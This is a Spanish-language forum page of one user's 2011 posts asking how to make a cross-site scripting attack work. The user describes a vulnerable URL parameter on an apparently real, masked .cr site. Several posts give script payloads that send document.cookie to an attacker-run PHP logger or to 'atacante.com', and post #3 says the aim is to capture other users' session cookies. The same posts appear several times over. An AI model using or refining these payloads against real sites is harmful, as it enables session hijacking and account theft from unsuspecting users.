Excelente voy a intentar esto muchas gracias
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#2
Nivel Web / Re: Cross Site Scripting
11 Febrero 2011, 05:10 AM
Por ejemplo asi es como se ve el URL de la pagina
http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=0
yo quito el "0" y pongo <script>alert(document.cookie)</script> y me muestra la cookie de session que estoy utilizando
intente este script para que me lleve al dominio donde tengo el archivo php que guarda las cookies, pero no me esta llevando a mi sitio, este es el script
<script>location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>
asi es como se ve el URL con el script
http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>
pero no me lleva a mi sitio, hay algun error en el script?
saludos
http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=0
yo quito el "0" y pongo <script>alert(document.cookie)</script> y me muestra la cookie de session que estoy utilizando
intente este script para que me lleve al dominio donde tengo el archivo php que guarda las cookies, pero no me esta llevando a mi sitio, este es el script
<script>location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>
asi es como se ve el URL con el script
http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>
pero no me lleva a mi sitio, hay algun error en el script?
saludos
#3
Nivel Web / Re: Cross Site Scripting
11 Febrero 2011, 04:21 AM
Si claro la pagina es vulnerable pero parece que falta la parte de &buscar=; para que se ejecute el grabar las cookies de los usuarios, por eso preguntaba que si se puede poner algo en ves de ese &buscar=;
o como podria estar mejor hecho el script
o como podria estar mejor hecho el script
#4
Nivel Web / Cross Site Scripting
11 Febrero 2011, 03:29 AM
Saludos,
Estuve intentando el tutorial (http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.45.html) y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo
asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
como puedo hacer para que se ejecute? Saludos
Estuve intentando el tutorial (http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.45.html) y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo
asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
como puedo hacer para que se ejecute? Saludos
#5
Dudas Generales / Pregunta XSS
10 Febrero 2011, 17:37 PM
Saludos,
Estuve intentando el tutorial (http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.45.html) y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo
asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
como puedo hacer para que se ejecute? Saludos
Estuve intentando el tutorial (http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.45.html) y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo
asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
como puedo hacer para que se ejecute? Saludos
#6
Tutoriales - Documentación / Re: [::Tutorial::] - Ataques XSS
9 Febrero 2011, 15:15 PM
Saludos,
Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo
asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
como puedo hacer para que se ejecute? Saludos
Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo
asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
como puedo hacer para que se ejecute? Saludos
Páginas1